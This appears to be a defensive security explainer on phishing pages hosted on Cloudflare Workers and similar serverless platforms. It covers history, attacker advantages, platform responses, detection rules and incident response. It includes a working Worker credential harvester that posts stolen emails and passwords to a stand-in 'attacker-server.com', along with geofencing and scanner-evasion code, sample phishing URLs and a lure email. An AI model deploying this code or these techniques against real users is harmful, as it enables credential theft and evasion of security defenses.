Cloudflare Workers Phishing
Attackers abuse serverless platforms to host phishing pages; inherits Cloudflare's trusted reputation, SSL, and global infrastructure while being cheap and disposable.
MITRE ATT&CK: T1566.002Timeline: The Cat and Mouse
2019 β Attack emerges β 2021 β Platform responds β 2024 β Arms race continues β Present
The Evolution
| Phase | Period | What Happened |
|---|---|---|
| ATTACK | 2019 | Workers abuse emerges; free tier + trusted domain exploited |
| PEAK | 2021-2023 | Mass adoption by phishing kits; Cloudflare Pages adds attack surface |
| RESPONSE | 2021 | Cloudflare adds automated abuse detection |
| Β | 2022 | Security vendors track workers.dev reputation |
| Β | 2023 | Some browsers warn on suspicious serverless URLs |
| ADAPTATION | 2024 | Custom domains, multi-platform (AWS Lambda, Azure Functions) |
| CURRENT | Present | Active cat-and-mouse; rapid rotation defeats detection |
Key Events with Sources
| Date | Event | Significance | Source |
|---|---|---|---|
| 2019 | Workers phishing emerges | Free serverless with trusted domain discovered by attackers | Trend Micro |
| 2020 | Cloudflare Pages adds risk | Additional attack surface with pages.dev | Cloudflare |
| 2021 | Cloudflare abuse detection | ML-based scanning for phishing patterns | Cloudflare |
| 2022 | Phishing kits support Workers | Commoditized attacks on serverless | Cofense |
| 2023 | Multi-platform abuse | AWS Lambda, Azure Functions, Vercel also targeted | Akamai |
Overview
As defenders got better at blocking traditional phishing infrastructure, attackers moved to serverless platforms. Cloudflare Workers offers free hosting, automatic SSL, edge deployment, andβcriticallyβinherits Cloudflareβs trusted reputation. A phishing page on workers.dev looks legitimate, loads fast globally, and is trivial to deploy and replace.
The Attack
Why Serverless Phishing Works
Traditional Phishing Infrastructure:
1. Register domain (leaves paper trail)
2. Rent VPS hosting (costs money, requires account)
3. Configure web server (technical effort)
4. Get SSL certificate (extra steps)
5. Deploy phishing page
6. Get blocked after hours/days
7. Repeat from step 1
Serverless Phishing:
1. Sign up for Cloudflare (free, minimal verification)
2. Deploy Worker with phishing code
3. Active at unique-name.workers.dev
4. Automatic SSL, global CDN
5. Get blocked? Deploy new Worker in seconds
Cloudflare Workers Advantages for Attackers
| Feature | Legitimate Use | Attacker Abuse |
|---|---|---|
| Free tier | Testing, small projects | Unlimited phishing pages |
| workers.dev subdomain | Quick deployment | Trusted-looking URL |
| Automatic SSL | Security | Green padlock for phishing |
| Edge deployment | Performance | Fast globally |
| Serverless | No server management | No infrastructure to take down |
| Quick deployment | Developer agility | Replace blocked pages instantly |
Phishing URL Examples
# Cloudflare Workers
https://microsoft-login-verify.workers.dev
https://secure-dropbox-share.workers.dev
https://paypal-account-update.workers.dev
# Cloudflare Pages
https://office365-signin.pages.dev
https://google-drive-viewer.pages.dev
# Custom domain through Cloudflare (harder to detect)
https://login.microsoft-support.workers.dev
Worker Code Example
// Simple phishing credential harvester
export default {
async fetch(request) {
if (request.method === "POST") {
// Capture credentials
const formData = await request.formData();
const email = formData.get("email");
const password = formData.get("password");
// Exfiltrate to attacker
await fetch("https://attacker-server.com/collect", {
method: "POST",
body: JSON.stringify({ email, password, timestamp: Date.now() })
});
// Redirect to real login page
return Response.redirect("https://login.microsoft.com", 302);
}
// Serve phishing page
return new Response(PHISHING_HTML, {
headers: { "Content-Type": "text/html" }
});
}
}
Advanced Techniques
Geofencing:
// Only show phishing to target region
export default {
async fetch(request) {
const country = request.cf.country;
if (country !== "US") {
// Show benign content to non-targets
return new Response("Coming soon!");
}
// Show phishing to US visitors
return new Response(PHISHING_HTML);
}
}
Bot Detection:
// Evade security scanners
export default {
async fetch(request) {
const ua = request.headers.get("User-Agent");
// Block known security scanners
if (ua.includes("bot") || ua.includes("crawler") || ua.includes("scanner")) {
return new Response("Page not found", { status: 404 });
}
// Check for headless browsers
const ip = request.headers.get("CF-Connecting-IP");
if (await isKnownSecurityVendorIP(ip)) {
return new Response("404", { status: 404 });
}
return new Response(PHISHING_HTML);
}
}
Turnstile Integration:
// Abuse Cloudflare's own CAPTCHA
// Forces human interaction before showing phishing
// Legitimate-looking, blocks automated scanners
Raw Email Headers (Serverless Phishing)
The phishing email links to a workers.dev URLβall authentication is for the attackerβs domain:
Return-Path: <noreply@microsoft-notice.com>
Received: from mail.microsoft-notice.com (mail.microsoft-notice.com [198.51.100.77])
by mx.victim.com (Postfix) with ESMTPS id WORK3R5
for <user@victim.com>; Mon, 27 Jan 2025 11:22:33 -0500 (EST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=microsoft-notice.com; s=mail;
h=from:to:subject:date;
bh=workers123...;
b=phishing456...
Authentication-Results: mx.victim.com;
dkim=pass header.d=microsoft-notice.com;
spf=pass smtp.mailfrom=noreply@microsoft-notice.com;
dmarc=pass (p=REJECT) header.from=microsoft-notice.com
From: "Microsoft Account Security" <security@microsoft-notice.com>
To: user@victim.com
Subject: [Action Required] Unusual Sign-in Activity Detected
Date: Mon, 27 Jan 2025 11:22:30 -0500
Message-ID: <phish-001@microsoft-notice.com>
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
<html>
<body>
<p>We detected unusual sign-in activity on your account.</p>
<p>Please verify your identity immediately:</p>
<a href="https://ms-account-verify.workers.dev/login?id=abc123">
Verify Now
</a>
</body>
</html>
Key observations:
dkim=pass,spf=pass,dmarc=passβ Cousin domain is fully authenticated- Link points to
workers.devβ Cloudflareβs trusted infrastructure - URL has valid SSL automatically (Cloudflare provides it)
microsoft-notice.comlooks legitimate at a glance- Phishing page hosted on edge, fast globally, disposable
Attack Flow
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 1. PHISHING EMAIL β
β β
β From: security@microsoft-notice.com β
β Subject: Action Required: Verify Your Account β
β β
β "Click here to verify your identity" β
β Link: https://ms-verify-account.workers.dev β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 2. CLOUDFLARE WORKERS (Edge) β
β β
β URL: https://ms-verify-account.workers.dev β
β β Valid SSL (automatic) β
β β Fast loading (CDN) β
β β Trusted IP range (Cloudflare) β
β β
β Worker serves pixel-perfect Microsoft login clone β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β 3. CREDENTIAL CAPTURE β
β β
β User enters: user@company.com / Password123 β
β Worker POSTs to: https://attacker-c2.com/harvest β
β User redirected to: https://login.microsoft.com β
β β
β User thinks login failed, tries real site, succeeds β
β Never realizes credentials were stolen β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Other Serverless Platforms Abused
| Platform | Domain | Free Tier |
|---|---|---|
| Cloudflare Workers | workers.dev | 100K requests/day |
| Cloudflare Pages | pages.dev | Unlimited sites |
| AWS Lambda + API Gateway | execute-api.amazonaws.com | 1M requests/month |
| Azure Functions | azurewebsites.net | 1M requests/month |
| Google Cloud Functions | cloudfunctions.net | 2M invocations/month |
| Vercel | vercel.app | 100GB bandwidth |
| Netlify | netlify.app | 100GB bandwidth |
Defenses
URL Reputation Updates
Security vendors now track serverless domains:
# Traditional reputation
evil-phishing-site.com β Blocked
# Updated to include serverless
*.workers.dev β Elevated scrutiny
*.pages.dev β Monitor for brand impersonation
*.vercel.app β Check for phishing patterns
Cloudflareβs Response
Automated Scanning:
- Machine learning detection of phishing content
- Brand impersonation detection
- Known phishing kit signatures
Abuse Reporting:
- Faster takedown of reported Workers
- Integration with anti-phishing alliances
- Proactive scanning for credential harvesting
Browser Protections
Modern browsers check:
- Google Safe Browsing database
- Microsoft SmartScreen
- Proprietary URL reputation
Challenge: Workers can be deployed faster than databases update.
Enterprise Controls
DNS Filtering:
# Block newly registered Workers
age(*.workers.dev) < 24h β Block
# Block suspicious patterns
*login*.workers.dev β Block
*verify*.workers.dev β Block
*secure*.workers.dev β Block
Proxy Inspection:
- TLS inspection to see Worker content
- Keyword detection (login, password, verify)
- Brand logo detection
Attacker Adaptation
Subdomain Randomization
# Avoid pattern-based blocking
https://x7k2m9p.workers.dev
https://a1b2c3d4e5.workers.dev
# Use legitimate-sounding but random
https://document-share-2847.workers.dev
Custom Domains
Route through custom domains to hide workers.dev:
# Attacker registers: microsoft-support.net
# Routes through Cloudflare to Worker
https://login.microsoft-support.net β workers.dev backend
# Hides the serverless indicator
Rapid Rotation
When detected, deploy new Worker immediately:
# Attacker automation
for target_batch in victims:
worker_url = deploy_new_worker()
send_phishing_campaign(target_batch, worker_url)
sleep(random(10, 30)) # minutes
delete_worker()
Multi-Stage Redirects
Email Link β Legitimate shortener β Cloudflare Worker β Phishing page
(t.co, bit.ly)
# Each hop makes detection harder
# Shortener sees Workers URL (not obviously bad)
# Worker serves phishing (new URL each campaign)
Current State
Status: Active
Serverless phishing continues to grow:
| Trend | Impact |
|---|---|
| Phishing kits include Workers support | Democratized attack |
| Detection improving | Arms race continues |
| Multi-platform abuse | Canβt block one provider |
| Custom domain fronting | Harder to detect |
Detection Guidance
Email Analysis
Flag emails containing:
url.domain MATCHES (
"*.workers.dev",
"*.pages.dev",
"*.vercel.app",
"*.netlify.app"
)
AND email.is_external = true
AND url.path CONTAINS ("login", "signin", "verify", "account")
URL Inspection
Before allowing access:
- Check domain age
- Look for brand impersonation in subdomain
- Inspect page content for credential forms
- Check SSL certificate (workers.dev cert vs legitimate brand)
User Training
Educate users:
- Legitimate Microsoft login is login.microsoft.com, not *.workers.dev
- Check the full URL, not just the padlock
- Be suspicious of emails with unfamiliar domains
- When in doubt, navigate directly to the service
Network Monitoring
Track access to serverless domains:
# Alert on unusual serverless domain access
dst.domain IN serverless_providers
AND user.department = "Finance"
AND dst.url.path CONTAINS "login"
Incident Response
When serverless phishing detected:
- Report to platform abuse team
- Block specific Worker URL
- Check if employees visited
- Reset credentials if accessed
- Add indicators to blocklist
What Killed It (or Weakened It)
| Defense | Introduced | Impact |
|---|---|---|
| Cloudflare Abuse Detection | 2021 | Automated scanning for known phishing patterns |
| URL Reputation for Serverless | 2022 | Security vendors track workers.dev and pages.dev reputation |
| Browser Warnings | 2023 | Some browsers warn on suspicious serverless URLs |